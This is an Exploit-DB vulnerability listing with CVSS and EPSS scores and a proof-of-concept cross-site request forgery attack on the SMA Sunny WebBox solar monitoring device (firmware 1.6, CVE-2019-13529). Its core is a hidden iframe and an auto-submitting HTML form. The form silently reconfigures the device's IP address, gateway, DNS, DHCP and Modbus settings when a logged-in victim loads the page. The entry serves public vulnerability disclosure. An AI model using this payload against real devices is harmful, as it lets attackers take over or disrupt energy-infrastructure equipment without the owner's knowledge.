Lucene search

K
exploitdbBorja MerinoEDB-ID:47480
HistoryOct 10, 2019 - 12:00 a.m.

SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery

2019-10-1000:00:00
Borja Merino
www.exploit-db.com
308

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.8 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

50.5%

# Exploit Title: SMA Solar Technology AG Sunny WebBox device - 1.6 - Cross-Site Request Forgery
# Date: 2019-10-08
# Exploit Author: Borja Merino and Eduardo Villaverde
# Vendor Homepage: https://www.sma.de
# Version: Firmware Version 1.6 and prior
# Tested on: Sunny WebBox SMA Solar Device (Firmware Version 1.6)
# CVE : CVE-2019-13529
# ICS-Cert Advisory: https://www.us-cert.gov/ics/advisories/icsa-19-281-01

<!-- Change any hidden value -->

<iframe style="display:none" name="csrf-frame"></iframe>
<form method='POST' action='http://X.X.X.X/wb_network_changed.htm' target="csrf-frame" id="csrf-form">
  <input type='hidden' name='RadioButtonDhcp' value='off'>
  <input type='hidden' name='IpAddr' value='1.1.1.1'>
  <input type='hidden' name='SubnetMask' value='255.255.255.0'>
  <input type='hidden' name='Gateway' value='1.1.1.1'> 
  <input type='hidden' name='DnsIpAddr' value='5.5.5.1'>
  <input type='hidden' name='Dns2IpAddr' value='5.5.5.2'>
  <input type='hidden' name='StaticNatPortHttp' value='80'>
  <input type='hidden' name='WebserverPort' value='80'>
  <input type='hidden' name='WebservicePort' value='80'>
  <input type='hidden' name='RadioButtonModbus' value='off'>
  <input type='hidden' name='ModbusPort' value='502'>
  <input type='hidden' name='BConfirm' value='Confirmar'>
  <input type='submit' value='submit'>
</form>
<script>document.getElementById("csrf-form").submit()</script>

6.8 Medium

CVSS2

Attack Vector

NETWORK

Attack Complexity

MEDIUM

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

PARTIAL

Availability Impact

PARTIAL

AV:N/AC:M/Au:N/C:P/I:P/A:P

8.8 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

REQUIRED

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

HIGH

Availability Impact

HIGH

CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

8.8 High

AI Score

Confidence

High

0.001 Low

EPSS

Percentile

50.5%